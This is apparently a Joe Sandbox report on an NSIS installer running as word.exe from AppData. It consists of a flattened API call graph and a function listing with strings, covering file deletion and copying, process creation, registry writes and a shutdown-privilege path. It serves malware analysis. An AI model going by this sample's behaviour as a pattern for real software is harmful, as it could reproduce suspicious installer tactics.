4116->4119 4118->4119 4120 401112 6 API calls 4118->4120 4119->4117 4120->4119 3127 403981 3128 403ad4 3127->3128 3129 403999 3127->3129 3130 403b25 3128->3130 3131 403ae5 GetDlgItem GetDlgItem 3128->3131 3129->3128 3132 4039a5 3129->3132 3134 403b7f 3130->3134 3226 401389 3130->3226 3223 403e54 3131->3223 3135 4039b0 SetWindowPos 3132->3135 3136 4039c3 3132->3136 3145 403acf 3134->3145 3200 403ea0 3134->3200 3135->3136 3137 4039e0 3136->3137 3138 4039c8 ShowWindow 3136->3138 3141 403a02 3137->3141 3142 4039e8 DestroyWindow 3137->3142 3138->3137 3139 403b0f SetClassLongA 3143 40140b 2 API calls 3139->3143 3147 403a07 SetWindowLongA 3141->3147 3148 403a18 3141->3148 3146 403dfe 3142->3146 3143->3130 3146->3145 3155 403e0e ShowWindow 3146->3155 3147->3145 3152 403ac1 3148->3152 3153 403a24 GetDlgItem 3148->3153 3150 40140b 2 API calls 3167 403b91 3150->3167 3151 403ddf DestroyWindow EndDialog 3151->3146 3209 403ebb 3152->3209 3156 403a54 3153->3156 3157 403a37 SendMessageA IsWindowEnabled 3153->3157 3154 403b5b SendMessageA 3154->3145 3155->3145 3160 403a61 3156->3160 3162 403aa8 SendMessageA 3156->3162 3163 403a74 3156->3163 3171 403a59 3156->3171 3157->3145 3157->3156 3159 405bba 18 API calls 3159->3167 3160->3162 3160->3171 3162->3152 3164 403a91 3163->3164 3165 403a7c 3163->3165 3169 40140b 2 API calls 3164->3169 3203 40140b 3165->3203 3166 403a8f 3166->3152 3167->3150 3167->3151 3167->3159 3170 403e54 19 API calls 3167->3170 3173 403e54 19 API calls 3167->3173 3172 403a98 3169->3172 3170->3167 3206 403e2d 3171->3206 3172->3152 3172->3171 3174 403c0c GetDlgItem 3173->3174 3175 403c21 3174->3175 3176 403c29 ShowWindow EnableWindow 3174->3176 3175->3176 3230 403e76 EnableWindow 3176->3230 3178 403c53 EnableWindow 3181 403c67 3178->3181 3179 403c6c GetSystemMenu EnableMenuItem SendMessageA 3180 403c9c SendMessageA 3179->3180 3179->3181 3180->3181 3181->3179 3231 403e89 SendMessageA 3181->3231 3232 405b98 lstrcpynA 3181->3232 3184 403cca lstrlenA 3185 405bba 18 API calls 3184->3185 3186 403cdb SetWindowTextA 3185->3186 3187 401389 2 API calls 3186->3187 3188 403cec 3187->3188 3188->3145 3188->3167 3189 403d1f DestroyWindow 3188->3189 3191 403d1a 3188->3191 3189->3146 3190 403d39 CreateDialogParamA 3189->3190 3190->3146 3192 403d6c 3190->3192 3191->3145 3193 403e54 19 API calls 3192->3193 3194 403d77 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3193->3194 3195 401389 2 API calls 3194->3195 3196 403dbd 3195->3196 3196->3145 3197 403dc5 ShowWindow 3196->3197 3198 403ea0 SendMessageA 3197->3198 3199 403ddd 3198->3199 3199->3146 3201 403eb8 3200->3201 3202 403ea9 SendMessageA 3200->3202 3201->3167 3202->3201 3204 401389 2 API calls 3203->3204 3205 401420 3204->3205 3205->3171 3207 403e34 3206->3207 3208 403e3a SendMessageA 3206->3208 3207->3208 3208->3166 3210 403ed3 GetWindowLongA 3209->3210 3220 403f5c 3209->3220 3211 403ee4 3210->3211 3210->3220 3212 403ef3 GetSysColor 3211->3212 3213 403ef6 3211->3213 3212->3213 3214 403f06 SetBkMode 3213->3214 3215 403efc SetTextColor 3213->3215 3216 403f24 3214->3216 3217 403f1e GetSysColor 3214->3217 3215->3214 3218 403f35 3216->3218 3219 403f2b SetBkColor 3216->3219 3217->3216 3218->3220 3221 403f48 DeleteObject 3218->3221 3222 403f4f CreateBrushIndirect 3218->3222 3219->3218 3220->3145 3221->3222 3222->3220 3224 405bba 18 API calls 3223->3224 3225 403e5f SetDlgItemTextA 3224->3225 3225->3139 3227 401390 3226->3227 3228 4013fe 3227->3228 3229 4013cb MulDiv SendMessageA 3227->3229 3228->3134 3228->3154 3229->3227 3230->3178 3231->3181 3232->3184 4121 401b02 4122 402a29 18 API calls 4121->4122 4123 401b09 4122->4123 4124 402a0c 18 API calls 4123->4124 4125 401b12 wsprintfA 4124->4125 4126 4028be 4125->4126 4127 401a03 4128 402a29 18 API calls 4127->4128 4129 401a0c ExpandEnvironmentStringsA 4128->4129 4130 401a20 4129->4130 4132 401a33 4129->4132 4131 401a25 lstrcmpA 4130->4131 4130->4132 4131->4132 4133 401f84 4134 401f96 4133->4134 4144 402045 4133->4144 4135 402a29 18 API calls 4134->4135 4136 401f9d 4135->4136 4138 402a29 18 API calls 4136->4138 4137 401423 25 API calls 4139 40219c 4137->4139 4140 401fa6 4138->4140 4141 401fbb LoadLibraryExA 4140->4141 4142 401fae GetModuleHandleA 4140->4142 4143 401fcb GetProcAddress 4141->4143 4141->4144 4142->4141 4142->4143 4145 402018 4143->4145 4146 401fdb 4143->4146 4144->4137 4147 404e84 25 API calls 4145->4147 4148 401423 25 API calls 4146->4148 4149 401feb 4146->4149 4147->4149 4148->4149 4149->4139 4150 402039 FreeLibrary 4149->4150 4150->4139 4165 401c8a 4166 402a0c 18 API calls 4165->4166 4167 401c90 IsWindow 4166->4167 4168 4019f3 4167->4168 4169 401490 4170 404e84 25 API calls 4169->4170 4171 401497 4170->4171 3233 403511 3234 403529 3233->3234 3235 40351b CloseHandle 3233->3235 3240 403556 3234->3240 3235->3234 3241 403564 3240->3241 3242 40352e 3241->3242 3243 403569 FreeLibrary GlobalFree 3241->3243 3244 4054bd 3242->3244 3243->3242 3243->3243 3286 40576c 3244->3286 3247 4054f1 3250 405626 3247->3250 3300 405b98 lstrcpynA 3247->3300 3248 4054da DeleteFileA 3249 40353a 3248->3249 3250->3249 3257 405e93 2 API calls 3250->3257 3252 40551b 3253 40552c 3252->3253 3254 40551f lstrcatA 3252->3254 3301 4056d2 lstrlenA 3253->3301 3255 405532 3254->3255 3258 405540 lstrcatA 3255->3258 3260 40554b lstrlenA FindFirstFileA 3255->3260 3259 40564b 3257->3259 3258->3260 3259->3249 3261 40568b 3 API calls 3259->3261 3260->3250 3281 40556f 3260->3281 3263 405655 3261->3263 3262 4056b6 CharNextA 3262->3281 3264 405850 2 API calls 3263->3264 3265 40565b RemoveDirectoryA 3264->3265 3266 405666 3265->3266 3267 40567d 3265->3267 3266->3249 3269 40566c 3266->3269 3270 404e84 25 API calls 3267->3270 3272 404e84 25 API calls 3269->3272 3270->3249 3271 405605 FindNextFileA 3273 40561d FindClose 3271->3273 3271->3281 3275 405674 3272->3275 3273->3250 3274 4055cc 3277 405850 2 API calls 3274->3277 3276 4058e6 40 API calls 3275->3276 3279 40567b 3276->3279 3280 4055d2 DeleteFileA 3277->3280 3278 4054bd 61 API calls 3278->3281 3279->3249 3285 4055dd 3280->3285 3281->3262 3281->3271 3281->3274 3281->3278 3305 405b98 lstrcpynA 3281->3305 3282 404e84 25 API calls 3282->3271 3283 404e84 25 API calls 3283->3285 3285->3271 3285->3282 3285->3283 3306 4058e6 3285->3306 3332 405b98 lstrcpynA 3286->3332 3288 40577d 3333 40571f CharNextA CharNextA 3288->3333 3291 4054d1 3291->3247 3291->3248 3292 405dfa 5 API calls 3298 405793 3292->3298 3293 4057be lstrlenA 3294 4057c9 3293->3294 3293->3298 3295 40568b 3 API calls 3294->3295 3297 4057ce GetFileAttributesA 3295->3297 3296 405e93 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 4056d2 2 API calls 3298->3299 3299->3293 3300->3252 3302 4056df 3301->3302 3303 4056f0 3302->3303 3304 4056e4 CharPrevA 3302->3304 3303->3255 3304->3302 3304->3303 3305->3281 3339 405f28 GetModuleHandleA 3306->3339 3309 40594e GetShortPathNameA 3310 405963 3309->3310 3314 405a43 3309->3314 3313 40596b wsprintfA 3310->3313 3310->3314 3312 405932 CloseHandle GetShortPathNameA 3312->3314 3315 405946 3312->3315 3316 405bba 18 API calls 3313->3316 3314->3285 3315->3309 3315->3314 3317 405993 3316->3317 3346 40586f GetFileAttributesA CreateFileA 3317->3346 3319 4059a0 3319->3314 3320 4059af GetFileSize GlobalAlloc 3319->3320 3321 405a3c CloseHandle 3320->3321 3322 4059cd ReadFile 3320->3322 3321->3314 3322->3321 3323 4059e1 3322->3323 3323->3321 3347 4057e4 lstrlenA 3323->3347 3326 405a50 3329 4057e4 4 API calls 3326->3329 3327 4059f6 3352 405b98 lstrcpynA 3327->3352 3330 405a04 3329->3330 3331 405a17 SetFilePointer WriteFile GlobalFree 3330->3331 3331->3321 3332->3288 3334 405739 3333->3334 3336 405745 3333->3336 3335 405740 CharNextA 3334->3335 3334->3336 3338 405762 3335->3338 3337 4056b6 CharNextA 3336->3337 3336->3338 3337->3336 3338->3291 3338->3292 3340 405f44 3339->3340 3341 405f4e GetProcAddress 3339->3341 3353 405eba GetSystemDirectoryA 3340->3353 3343 4058f1 3341->3343 3343->3309 3343->3314 3345 40586f GetFileAttributesA CreateFileA 3343->3345 3344 405f4a 3344->3341 3344->3343 3345->3312 3346->3319 3348 40581a lstrlenA 3347->3348 3349 405824 3348->3349 3350 4057f8 lstrcmpiA 3348->3350 3349->3326 3349->3327 3350->3349 3351 405811 CharNextA 3350->3351 3351->3348 3352->3330 3355 405edc wsprintfA LoadLibraryExA 3353->3355 3355->3344 4179 404292 4180 4042be 4179->4180 4181 4042cf 4179->4181 4240 40543d GetDlgItemTextA 4180->4240 4183 4042db GetDlgItem 4181->4183 4188 40433a 4181->4188 4185 4042ef 4183->4185 4184 4042c9 4187 405dfa 5 API calls 4184->4187 4190 404303 SetWindowTextA 4185->4190 4195 40571f 4 API calls 4185->4195 4186 40441e 4238 4045c8 4186->4238 4242 40543d GetDlgItemTextA 4186->4242 4187->4181 4188->4186 4192 405bba 18 API calls 4188->4192 4188->4238 4193 403e54 19 API calls 4190->4193 4191 40444e 4196 40576c 18 API calls 4191->4196 4197 4043ae SHBrowseForFolderA 4192->4197 4198 40431f 4193->4198 4194 403ebb 8 API calls 4199 4045dc 4194->4199 4200 4042f9 4195->4200 4201 404454 4196->4201 4197->4186 4202 4043c6 CoTaskMemFree 4197->4202 4203 403e54 19 API calls 4198->4203 4200->4190 4204 40568b 3 API calls 4200->4204 4243 405b98 lstrcpynA 4201->4243 4205 40568b 3 API calls 4202->4205 4206 40432d 4203->4206 4204->4190 4207 4043d3 4205->4207 4241 403e89 SendMessageA 4206->4241 4210 40440a SetDlgItemTextA 4207->4210 4215 405bba 18 API calls 4207->4215 4210->4186 4211 404333 4213 405f28 5 API calls 4211->4213 4212 40446b 4214 405f28 5 API calls 4212->4214 4213->4188 4222 404472 4214->4222 4216 4043f2 lstrcmpiA 4215->4216 4216->4210 4219 404403 lstrcatA 4216->4219 4217 4044ae 4244 405b98 lstrcpynA 4217->4244 4219->4210 4220 4044b5 4221 40571f 4 API calls 4220->4221 4223 4044bb GetDiskFreeSpaceA 4221->4223 4222->4217 4225 4056d2 2 API calls 4222->4225 4227 404506 4222->4227 4226 4044df MulDiv 4223->4226 4223->4227 4225->4222 4226->4227 4228 404577 4227->4228 4229 40470e 21 API calls 4227->4229 4230 40459a 4228->4230 4231 40140b 2 API calls 4228->4231 4232 404564 4229->4232 4245 403e76 EnableWindow 4230->4245 4231->4230 4234 404579 SetDlgItemTextA 4232->4234 4235 404569 4232->4235 4234->4228 4237 404649 21 API calls 4235->4237 4236 4045b6 4236->4238 4246 404227 4236->4246 4237->4228 4238->4194 4240->4184 4241->4211 4242->4191 4243->4212 4244->4220 4245->4236 4247 404235 4246->4247 4248 40423a SendMessageA 4246->4248 4247->4248 4248->4238 4249 401595 4250 402a29 18 API calls 4249->4250 4251 40159c SetFileAttributesA 4250->4251 4252 4015ae 4251->4252 4253 401717 4254 402a29 18 API calls 4253->4254 4255 40171e SearchPathA 4254->4255 4256 401739 4255->4256 4257 402899 SendMessageA 4258 4028b3 InvalidateRect 4257->4258 4259 4028be 4257->4259 4258->4259 4260 40229a 4261 402a29 18 API calls 4260->4261 4262 4022a8 4261->4262 4263 402a29 18 API calls 4262->4263 4264 4022b1 4263->4264 4265 402a29 18 API calls 4264->4265 4266 4022bb GetPrivateProfileStringA 4265->4266 4267 403f9c 4268 403fb2 4267->4268 4273 4040bf 4267->4273 4271 403e54 19 API calls 4268->4271 4269 40412e 4270 404202 4269->4270 4272 404138 GetDlgItem 4269->4272 4278 403ebb 8 API calls 4270->4278 4274 404008 4271->4274 4275 4041c0 4272->4275 4276 40414e 4272->4276 4273->4269 4273->4270 4277 404103 GetDlgItem SendMessageA 4273->4277 4279 403e54 19 API calls 4274->4279 4275->4270 4281 4041d2 4275->4281 4276->4275 4280 404174 6 API calls 4276->4280 4298 403e76 EnableWindow 4277->4298 4283 4041fd 4278->4283 4284 404015 CheckDlgButton 4279->4284 4280->4275 4285 4041d8 SendMessageA 4281->4285 4286 4041e9 4281->4286 4296 403e76 EnableWindow 4284->4296 4285->4286 4286->4283 4289 4041ef SendMessageA 4286->4289 4287 404129 4290 404227 SendMessageA 4287->4290 4289->4283 4290->4269 4291 404033 GetDlgItem 4297 403e89 SendMessageA 4291->4297 4293 404049 SendMessageA 4294 404070 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4293->4294 4295 404067 GetSysColor 4293->4295 4294->4283 4295->4294 4296->4291 4297->4293 4298->4287 4299 40149d 4300 402241 4299->4300 4301 4014ab PostQuitMessage 4299->4301 4301->4300 4309 401b23 4310 401b30 4309->4310 4311 401b74 4309->4311 4312 40222e 4310->4312 4319 401b47 4310->4319 4313 401b78 4311->4313 4314 401b9d GlobalAlloc 4311->4314 4316 405bba 18 API calls 4312->4316 4324 401bb8 4313->4324 4330 405b98 lstrcpynA 4313->4330 4315 405bba 18 API calls 4314->4315 4315->4324 4318 40223b 4316->4318 4322 405459 MessageBoxIndirectA 4318->4322 4328 405b98 lstrcpynA 4319->4328 4320 401b8a GlobalFree 4320->4324 4322->4324 4323 401b56 4329 405b98 lstrcpynA 4323->4329 4326 401b65 4331 405b98 lstrcpynA 4326->4331 4328->4323 4329->4326 4330->4320 4331->4324 4332 4021a5 4333 402a29 18 API calls 4332->4333 4334 4021ab 4333->4334 4335 402a29 18 API calls 4334->4335 4336 4021b4 4335->4336 4337 402a29 18 API calls 4336->4337 4338 4021bd 4337->4338 4339 405e93 2 API calls 4338->4339 4340 4021c6 4339->4340 4341 4021d7 lstrlenA lstrlenA 4340->4341 4342 4021ca 4340->4342 4344 404e84 25 API calls 4341->4344 4343 404e84 25 API calls 4342->4343 4346 4021d2 4342->4346 4343->4346 4345 402213 SHFileOperationA 4344->4345 4345->4342 4345->4346 4347 402227 4348 40222e 4347->4348 4352 402241 4347->4352 4349 405bba 18 API calls 4348->4349 4350 40223b 4349->4350 4351 405459 MessageBoxIndirectA 4350->4351 4351->4352 4353 401ca7 4354 402a0c 18 API calls 4353->4354 4355 401cae 4354->4355 4356 402a0c 18 API calls 4355->4356 4357 401cb6 GetDlgItem 4356->4357 4358 4024eb 4357->4358 4358->4358 4359 4035a9 4360 4035b4 4359->4360 4361 4035b8 4360->4361 4362 4035bb GlobalAlloc 4360->4362 4362->4361 4363 40262e 4364 402635 4363->4364 4365 4028be 4363->4365 4366 40263b FindClose 4364->4366 4366->4365 4367 4026af 4368 402a29 18 API calls 4367->4368 4370 4026bd 4368->4370 4369 4026d3 4372 405850 2 API calls 4369->4372 4370->4369 4371 402a29 18 API calls 4370->4371 4371->4369 4373 4026d9 4372->4373 4393 40586f GetFileAttributesA CreateFileA 4373->4393 4375 4026e6 4376 4026f2 GlobalAlloc 4375->4376 4377 40278f 4375->4377 4378 402786 CloseHandle 4376->4378 4379 40270b 4376->4379 4380 402797 DeleteFileA 4377->4380 4381 4027aa 4377->4381 4378->4377 4394 4030b3 SetFilePointer 4379->4394 4380->4381 4383 402711 4384 403081 ReadFile 4383->4384 4385 40271a GlobalAlloc 4384->4385 4386 40272a 4385->4386 4387 40275e WriteFile GlobalFree 4385->4387 4389 402e8e 37 API calls 4386->4389 4388 402e8e 37 API calls 4387->4388 4390 402783 4388->4390 4392 402737 4389->4392 4390->4378 4391 402755 GlobalFree 4391->4387 4392->4391 4393->4375 4394->4383 4395 4027b0 4396 402a0c 18 API calls 4395->4396 4397 4027b6 4396->4397 4398 4027f1 4397->4398 4399 4027da 4397->4399 4400 40268f 4397->4400 4401 402807 4398->4401 4402 4027fb 4398->4402 4403 4027df 4399->4403 4408 4027ee 4399->4408 4405 405bba 18 API calls 4401->4405 4404 402a0c 18 API calls 4402->4404 4409 405b98 lstrcpynA 4403->4409 4404->4408 4405->4408 4408->4400 4410 405af6 wsprintfA 4408->4410 4409->4400 4410->4400 4411 401eb2 4412 402a29 18 API calls 4411->4412 4413 401eb9 4412->4413 4414 405e93 2 API calls 4413->4414 4415 401ebf 4414->4415 4417 401ed1 4415->4417 4418 405af6 wsprintfA 4415->4418 4418->4417 3356 4015b3 3357 402a29 18 API calls 3356->3357 3358 4015ba 3357->3358 3359 40571f 4 API calls 3358->3359 3374 4015c2 3359->3374 3360 40161c 3362 401621 3360->3362 3363 40164a 3360->3363 3361 4056b6 CharNextA 3361->3374 3383 401423 3362->3383 3366 401423 25 API calls 3363->3366 3369 401642 3366->3369 3371 401633 SetCurrentDirectoryA 3371->3369 3372 401604 GetFileAttributesA 3372->3374 3374->3360 3374->3361 3374->3372 3375 4053e0 3374->3375 3378 405346 CreateDirectoryA 3374->3378 3387 4053c3 CreateDirectoryA 3374->3387 3376 405f28 5 API calls 3375->3376 3377 4053e7 3376->3377 3377->3374 3379 405397 GetLastError 3378->3379 3381 405393 3378->3381 3380 4053a6 SetFileSecurityA 3379->3380 3379->3381 3380->3381 3382 4053bc GetLastError 3380->3382 3381->3374 3382->3381 3384 404e84 25 API calls 3383->3384 3385 401431 3384->3385 3386 405b98 lstrcpynA 3385->3386 3386->3371 3388 4053d3 3387->3388 3389 4053d7 GetLastError 3387->3389 3388->3374 3389->3388 4419 4016b3 4420 402a29 18 API calls 4419->4420 4421 4016b9 GetFullPathNameA 4420->4421 4424 4016d0 4421->4424 4428 4016f1 4421->4428 4422 401705 GetShortPathNameA 4423 4028be 4422->4423 4425 405e93 2 API calls 4424->4425 4424->4428 4426 4016e1 4425->4426 4426->4428 4429 405b98 lstrcpynA 4426->4429 4428->4422 4428->4423 4429->4428 4430 402336 4431 40233c 4430->4431 4432 402a29 18 API calls 4431->4432 4433 40234e 4432->4433 4434 402a29 18 API calls 4433->4434 4435 402358 RegCreateKeyExA 4434->4435 4436 402382 4435->4436 4439 4028be 4435->4439 4437 402a29 18 API calls 4436->4437 4438 40239a 4436->4438 4440 402393 lstrlenA 4437->4440 4441 402a0c 18 API calls 4438->4441 4443 4023a6 4438->4443 4440->4438 4441->4443 4442 4023c1 RegSetValueExA 4445 4023d7 RegCloseKey 4442->4445 4443->4442 4444 402e8e 37 API calls 4443->4444 4444->4442 4445->4439 4447 402836 4448 402a0c 18 API calls 4447->4448 4449 40283c 4448->4449 4450 40284a 4449->4450 4451 40286d 4449->4451 4453 40268f 4449->4453 4450->4453 4455 405af6 wsprintfA 4450->4455 4452 405bba 18 API calls 4451->4452 4451->4453 4452->4453 4455->4453 4456 4014b7 4457 4014bd 4456->4457 4458 401389 2 API calls 4457->4458 4459 4014c5 4458->4459 3390 401e38 3391 402a29 18 API calls 3390->3391 3392 401e3e 3391->3392 3393 404e84 25 API calls 3392->3393 3394 401e48 3393->3394 3406 4053f8 CreateProcessA 3394->3406 3396 401ea4 CloseHandle 3400 40268f 3396->3400 3397 401e6d WaitForSingleObject 3398 401e4e 3397->3398 3399 401e7b GetExitCodeProcess 3397->3399 3398->3396 3398->3397 3398->3400 3409 405f64 3398->3409 3402 401e98 3399->3402 3403 401e8d 3399->3403 3402->3396 3405 401e96 3402->3405 3413 405af6 wsprintfA 3403->3413 3405->3396 3407 405433 3406->3407 3408 405427 CloseHandle 3406->3408 3407->3398 3408->3407 3410 405f81 PeekMessageA 3409->3410 3411 405f91 3410->3411 3412 405f77 DispatchMessageA 3410->3412 3411->3397 3412->3410 3413->3405 4460 401d38 GetDC GetDeviceCaps 4461 402a0c 18 API calls 4460->4461 4462 401d54 MulDiv 4461->4462 4463 402a0c 18 API calls 4462->4463 4464 401d69 4463->4464 4465 405bba 18 API calls 4464->4465 4466 401da2 CreateFontIndirectA 4465->4466 4467 4024eb 4466->4467 4475 402539 4476 402a0c 18 API calls 4475->4476 4479 402543 4476->4479 4477 4025b9 4478 402577 ReadFile 4478->4477 4478->4479 4479->4477 4479->4478 4480 4025bb 4479->4480 4481 4025cb 4479->4481 4484 405af6 wsprintfA 4480->4484 4481->4477 4483 4025e1 SetFilePointer 4481->4483 4483->4477 4484->4477 3650 40173e 3651 402a29 18 API calls 3650->3651 3652 401745 3651->3652 3653 40589e 2 API calls 3652->3653 3654 40174c 3653->3654 3655 40589e 2 API calls 3654->3655 3655->3654 4485 40193f 4486 402a29 18 API calls 4485->4486 4487 401946 lstrlenA 4486->4487 4488 4024eb 4487->4488

                                  Executed Functions

                                  Function 004030FB Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 315stringfilecomCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 4030fb-403131 SetErrorMode GetVersion 1 403133-40313b call 405f28 0->1 2 403144 0->2 1->2 7 40313d 1->7 4 403149-40315c call 405eba lstrlenA 2->4 9 40315e-4031d0 call 405f28 * 2 #17 OleInitialize SHGetFileInfoA call 405b98 GetCommandLineA call 405b98 GetModuleHandleA 4->9 7->2 18 4031d2-4031d7 9->18 19 4031dc-4031f1 call 4056b6 CharNextA 9->19 18->19 22 40325a-40325e 19->22 23 403260 22->23 24 4031f3-4031f6 22->24 27 403273-40328b GetTempPathA call 4030ca 23->27 25 4031f8-4031fc 24->25 26 4031fe-403206 24->26 25->25 25->26 28 403208-403209 26->28 29 40320e-403211 26->29 37 4032b1-4032cb DeleteFileA call 402c55 27->37 38 40328d-4032ab GetWindowsDirectoryA lstrcatA call 4030ca 27->38 28->29 31 403213-403217 29->31 32 40324a-403257 call 4056b6 29->32 35 403229-40322f 31->35 36 403219-403222 31->36 32->22 49 403259 32->49 39 403241-403248 35->39 40 403231-40323a 35->40 36->35 43 403224 36->43 50 403332-403341 ExitProcess OleUninitialize 37->50 51 4032cd-4032d3 37->51 38->37 38->50 39->32 47 403262-40326e call 405b98 39->47 40->39 46 40323c 40->46 43->35 46->39 47->27 49->22 55 403456-40345c 50->55 56 403347-403357 call 405459 ExitProcess 50->56 53 403322-403329 call 4035eb 51->53 54 4032d5-4032de call 4056b6 51->54 62 40332e 53->62 68 4032e9-4032eb 54->68 60 403462-40347f call 405f28 * 3 55->60 61 4034f9-403501 55->61 83 403481-403483 60->83 84 4034c9-4034d7 call 405f28 60->84 64 403503 61->64 65 403507-40350b ExitProcess 61->65 62->50 64->65 71 4032e0-4032e6 68->71 72 4032ed-4032f7 68->72 71->72 74 4032e8 71->74 75 4032f9-403306 call 40576c 72->75 76 40335d-403371 call 4053e0 lstrcatA 72->76 74->68 75->50 87 403308-40331e call 405b98 * 2 75->87 85 403373-403379 lstrcatA 76->85 86 40337e-403398 lstrcatA lstrcmpiA 76->86 83->84 90 403485-403487 83->90 97 4034e5-4034f0 ExitWindowsEx 84->97 98 4034d9-4034e3 84->98 85->86 86->50 88 40339a-40339d 86->88 87->53 92 4033a6 call 4053c3 88->92 93 40339f-4033a4 call 405346 88->93 90->84 95 403489-40349b GetCurrentProcess 90->95 105 4033ab-4033b8 SetCurrentDirectoryA 92->105 93->105 95->84 111 40349d-4034bf 95->111 97->61 104 4034f2-4034f4 call 40140b 97->104 98->97 98->104 104->61 109 4033c5-4033df call 405b98 105->109 110 4033ba-4033c0 call 405b98 105->110 116 4033e4-403400 call 405bba DeleteFileA 109->116 110->109 111->84 119 403441-403448 116->119 120 403402-403412 CopyFileA 116->120 119->116 122 40344a-403451 call 4058e6 119->122 120->119 121 403414-403434 call 4058e6 call 405bba call 4053f8 120->121 121->119 131 403436-40343d CloseHandle 121->131 122->50 131->119
                                  APIs
                                  • SetErrorMode.KERNELBASE ref: 00403121
                                  • GetVersion.KERNEL32 ref: 00403127
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                  • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                  • OleInitialize.OLE32(00000000), ref: 00403178
                                  • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                  • GetCommandLineA.KERNEL32(mrodzekle Setup,NSIS Error), ref: 004031A9
                                  • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 004031BC
                                  • CharNextA.USER32(00000000), ref: 004031E7
                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                  • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • ExitProcess.KERNELBASE(00000020), ref: 00403332
                                  • OleUninitialize.OLE32 ref: 00403337
                                  • ExitProcess.KERNEL32 ref: 00403357
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 0040336A
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403379
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403384
                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403390
                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                  • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                  • CopyFileA.KERNEL32 ref: 0040340A
                                  • CloseHandle.KERNEL32(00000000), ref: 00403437
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                  • ExitProcess.KERNEL32 ref: 0040350B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                  • String ID: $ /D=$ _?=$"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$mrodzekle Setup$~nsu
                                  • API String ID: 1031542678-1864608781
                                  • Opcode ID: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                  • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                  • Opcode Fuzzy Hash: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                  • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004054BD Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
